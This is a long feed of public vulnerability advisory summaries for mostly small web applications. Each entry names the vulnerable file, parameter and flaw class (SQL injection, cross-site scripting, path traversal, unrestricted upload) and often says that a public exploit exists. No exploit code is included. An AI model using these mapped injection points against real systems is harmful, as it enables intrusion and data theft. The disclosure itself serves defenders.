A vulnerability, which was classified as problematic, has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This issue affects some unknown processing of the file \Service\FileHandler.ashx. The manipulation of the argument FileDirectory leads to absolute path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236207.
A vulnerability classified as problematic was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This vulnerability affects unknown code of the file \Service\FileDownload.ashx. The manipulation of the argument Files leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-236206 is the identifier assigned to this vulnerability.
A vulnerability was found in DedeBIZ 6.2.10. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Article Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-236186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Templatecookie Adlisting 2.14.0. It has been classified as problematic. Affected is an unknown function of the file /ad-list of the component Redirect Handler. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-236184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Media Browser Emby Server 4.7.13.0 and classified as problematic. This issue affects some unknown processing of the file /web/. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-236183.
A vulnerability has been found in Tongda OA and classified as critical. This vulnerability affects unknown code of the file general/system/seal_manage/dianju/delete_log.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-236182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Tongda OA. This affects an unknown part of the file general/system/seal_manage/iweboffice/delete_seal.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-236181 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S85F Management Platform up to 20230722. It has been classified as critical. Affected is an unknown function. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235968. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S85F Management Platform up to 20230722 and classified as critical. This issue affects some unknown processing of the file importhtml.php. The manipulation of the argument sql leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235967. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Academy LMS 6.0 and classified as problematic. This vulnerability affects unknown code of the file /academy/home/courses. The manipulation of the argument query/sort_by leads to cross site scripting. The attack can be initiated remotely. VDB-235966 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Cute Http File Server 2.0. This affects an unknown part of the component Search. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235965 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in PHP Jabbers Rental Property Booking 2.0. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235964. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in PHP Jabbers Cleaning Business 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. VDB-235962 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-235960. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in PHP Jabbers Shuttle Booking Software 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-235959. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely. VDB-235958 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely. The identifier VDB-235957 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
EmpowerID before 7.205.0.1 allows an attacker to bypass an MFA (multi factor authentication) requirement if the first factor (username and password) is known, because the first factor is sufficient to change an account's email address, and the product would then send MFA codes to the new email address (which may be attacker-controlled). NOTE: this is different from CVE-2023-4177, which claims to be about "some unknown processing of the component Multi-Factor Authentication Code Handler" and thus cannot be correlated with other vulnerability information.
Ghost is an open source content management system. Versions prior to 5.59.1 are subject to a vulnerability which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder. Version 5.59.1 contains a fix for this issue. All users are advised to upgrade. There are no known workarounds for this vulnerability.
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue.
A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.
A vulnerability was found in SourceCodester Jewelry Store System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file add_customer.php. The manipulation leads to cross site scripting. The attack may be launched remotely. VDB-235610 is the identifier assigned to this vulnerability.
A vulnerability was found in Cafe Billing System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Order Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235609 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Online Mens Salon Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=user/manage_user&amp;id=3. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235608.
A vulnerability was found in SourceCodester Simple Online Mens Salon Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/?page=user/list. The manipulation of the argument First Name/Last Name/Username leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235607.
A vulnerability has been found in SourceCodester Online Jewelry Store 1.0 and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235606 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in phpscriptpoint RecipePoint 1.9. This affects an unknown part of the file /recipe-result. The manipulation of the argument text/category/type/difficulty/cuisine/cooking_method leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-235605 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in GZ Scripts Availability Booking Calendar PHP 1.0. This affects an unknown part of the file /index.php?controller=GzUser&amp;action=edit&amp;id=1 of the component Image Handler. The manipulation of the argument img leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235569 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in GZ Scripts Availability Booking Calendar PHP 1.0. Affected by this issue is some unknown functionality of the file index.php of the component HTTP POST Request Handler. The manipulation of the argument promo_code leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235568.
A vulnerability was found in phpscriptpoint Lawyer 1.6. It has been classified as problematic. This affects an unknown part of the file search.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235401 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in phpscriptpoint Lawyer 1.6 and classified as problematic. Affected by this issue is some unknown functionality of the file page.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235400. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Campcodes Beauty Salon Management System 1.0. This affects an unknown part of the file /admin/edit-accepted-appointment.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235251.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235250 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/search-appointment.php. The manipulation of the argument searchdata leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235249 was assigned to this vulnerability.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/invoice.php. The manipulation of the argument inv_id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235248.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/edit_category.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235247.
A vulnerability has been found in Campcodes Beauty Salon Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/edit_product.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235246 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Campcodes Beauty Salon Management System 1.0. This affects an unknown part of the file /admin/add-category.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235245 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Beauty Salon Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit-accepted-appointment.php. The manipulation of the argument contactno leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235244.
A vulnerability classified as critical was found in Campcodes Beauty Salon Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php. The manipulation of the argument contactno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235243.
A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/del_service.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235242 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/del_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235241 was assigned to this vulnerability.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/about-us.php. The manipulation of the argument pagedes leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235240.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/add-services.php. The manipulation of the argument cost leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235239.
A vulnerability was found in Campcodes Beauty Salon Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/search-appointment.php. The manipulation of the argument searchdata leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235238 is the identifier assigned to this vulnerability.
A vulnerability has been found in Campcodes Beauty Salon Management System 0.1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/del_feedback.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235237 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235236.
A vulnerability, which was classified as critical, has been found in Campcodes Beauty Salon Management System 1.0. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235235.
A vulnerability classified as critical was found in Campcodes Beauty Salon Management System 1.0. This vulnerability affects unknown code of the file /admin/edit-services.php. The manipulation of the argument editid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235234 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. This affects an unknown part of the file /admin/edit_category.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235233 was assigned to this vulnerability.
Logistics Pipes is a modification (a.k.a. mod) for the computer game Minecraft Java Edition. The mod used Java's `ObjectInputStream#readObject` on untrusted data coming from clients or servers over the network resulting in possible remote code execution when sending specifically crafted network packets after connecting. The affected versions were released between 2013 and 2016 and the issue (back then unknown) was fixed in 2016 by a refactoring of the network IO code. The issue is present in all Logistics Pipes versions ranged from 0.7.0.91 prior to 0.10.0.71, which were downloaded from different platforms summing up to multi-million downloads. For Minecraft version 1.7.10 the issue was fixed in build 0.10.0.71. Everybody on Minecraft 1.7.10 should check their version number of Logistics Pipes in their modlist and update, if the version number is smaller than 0.10.0.71. Any newer supported Minecraft version (like 1.12.2) never had a Logistics Pipes version with vulnerable code. The best available workaround for vulnerable versions is to play in singleplayer only or update to newer Minecraft versions and modpacks.
A vulnerability was found in Travelmate Travelable Trek Management Solution 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Comment Box Handler. The manipulation of the argument comment leads to cross site scripting. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. VDB-235214 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in phpscriptpoint Insurance 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The identifier VDB-235213 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in phpscriptpoint Insurance 1.2. It has been classified as problematic. Affected is an unknown function of the file /page.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-235212. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in phpscriptpoint Car Listing 1.6 and classified as critical. This issue affects some unknown processing of the file /search.php of the component GET Parameter Handler. The manipulation of the argument brand_id/model_id/car_condition/car_category_id/body_type_id/fuel_type_id/transmission_type_id/year/mileage_start/mileage_end/country/state/city leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235211. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in phpscriptpoint Car Listing 1.6 and classified as problematic. This vulnerability affects unknown code of the file /search.php. The manipulation of the argument country/state/city leads to cross site scripting. The attack can be initiated remotely. VDB-235210 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in phpscriptpoint Ecommerce 1.15. This affects an unknown part of the file /product.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235209 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in phpscriptpoint Ecommerce 1.15. Affected by this issue is some unknown functionality of the file /blog-single.php. The manipulation of the argument slug leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235208. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in phpscriptpoint JobSeeker 1.5. Affected by this vulnerability is an unknown functionality of the file /search-result.php. The manipulation of the argument kw/lc/ct/cp/p leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235207. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in phpscriptpoint BloodBank 1.1. Affected is an unknown function of the file /search of the component POST Parameter Handler. The manipulation of the argument country/city/blood_group_id leads to sql injection. It is possible to launch the attack remotely. VDB-235206 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in phpscriptpoint BloodBank 1.1. It has been rated as problematic. This issue affects some unknown processing of the file page.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235205 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in OpenRapid RapidCMS up to 1.3.1. It has been declared as critical. This vulnerability affects unknown code of the file /admin/upload.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 4dff387283060961c362d50105ff8da8ea40bcbe. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-235204.
A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_category of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-235201 was assigned to this vulnerability.
Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 affects all Kirby sites that might have potential attackers in the group of authenticated Panel users or that allow external visitors to upload an arbitrary file to the content folder. Kirby sites are not affected if they don't allow file uploads for untrusted users or visitors or if the file extensions of uploaded files are limited to a fixed safe list. The attack requires user interaction by another user or visitor and cannot be automated. An editor with write access to the Kirby Panel could upload a file with an unknown file extension like `.xyz` that contains HTML code including harmful content like `&lt;script&gt;` tags. The direct link to that file could be sent to other users or visitors of the site. If the victim opened that link in a browser where they are logged in to Kirby and the file had not been opened by anyone since the upload, Kirby would not be able to send the correct MIME content type, instead falling back to `text/html`. The browser would then run the script, which could for example trigger requests to Kirby's API with the permissions of the victim. The issue was caused by the underlying `Kirby\Http\Response::file()` method, which didn't have an explicit fallback if the MIME type could not be determined from the file extension. If you use this method in site or plugin code, these uses may be affected by the same vulnerability. The problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6. In all of the mentioned releases, the maintainers have fixed the affected method to use a fallback MIME type of `text/plain` and set the `X-Content-Type-Options: nosniff` header if the MIME type of the file is unknown.
A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-235200. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235199. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. VDB-235198 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235197 was assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235196. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235195. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability was found in Pointware EasyInventory 1.0.12.0 and classified as critical. This issue affects some unknown processing of the file C:\Program Files (x86)\EasyInventory\Easy2W.exe. The manipulation leads to unquoted search path. Attacking locally is a requirement. The identifier VDB-235193 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in NxFilter 4.3.2.5 and classified as problematic. This vulnerability affects unknown code of the file user.jsp. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The identifier of this vulnerability is VDB-235192. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in NxFilter 4.3.2.5. This affects an unknown part of the file /report,daily.jsp?stime=2023%2F07%2F12&amp;timeOption=yesterday&amp;. The manipulation of the argument user leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-235191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in DedeBIZ 6.2.10. Affected by this issue is some unknown functionality of the file /admin/sys_sql_query.php. The manipulation of the argument sqlquery leads to sql injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-235190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in DedeBIZ 6.2.10. Affected by this vulnerability is an unknown functionality of the file /admin/vote_edit.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in DedeBIZ 6.2.10. Affected is an unknown function of the file /admin/sys_sql_query.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Bug Finder MineStack 1.0. This affects an unknown part of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235161 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder EX-RATE 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder Montage 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235159. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder Wedding Wonders 1.0. It has been classified as problematic. Affected is an unknown function of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. It is possible to launch the attack remotely. VDB-235158 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder Finounce 1.0 and classified as problematic. This issue affects some unknown processing of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235157 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder SASS BILLER 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /company/store. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235151. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder ICOGenie 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/ticket/create of the component Support Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack can be initiated remotely. VDB-235150 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder Listplace Directory Listing Platform 3.0. It has been classified as problematic. This affects an unknown part of the file /listplace/user/coverPhotoUpdate of the component Photo Handler. The manipulation of the argument user_cover_photo leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235149 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bug Finder Listplace Directory Listing Platform 3.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /listplace/user/ticket/create of the component HTTP POST Request Handler. The manipulation of the argument message leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235148. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /?r=recruit/resume/edit&amp;op=status of the component Interview Handler. The manipulation of the argument resumeid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235147. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Hospital Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file patientprofile.php. The manipulation of the argument address leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235079.
A vulnerability was found in Hospital Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file patientappointment.php. The manipulation of the argument loginid/password/mobileno/appointmentdate/appointmenttime/patiente/dob/doct/city leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235078 is the identifier assigned to this vulnerability.
A vulnerability was found in Hospital Management System 1.0. It has been classified as critical. This affects an unknown part of the file patient.php. The manipulation of the argument address leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235077 was assigned to this vulnerability.
A vulnerability was found in Hospital Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file patientforgotpassword.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235076.
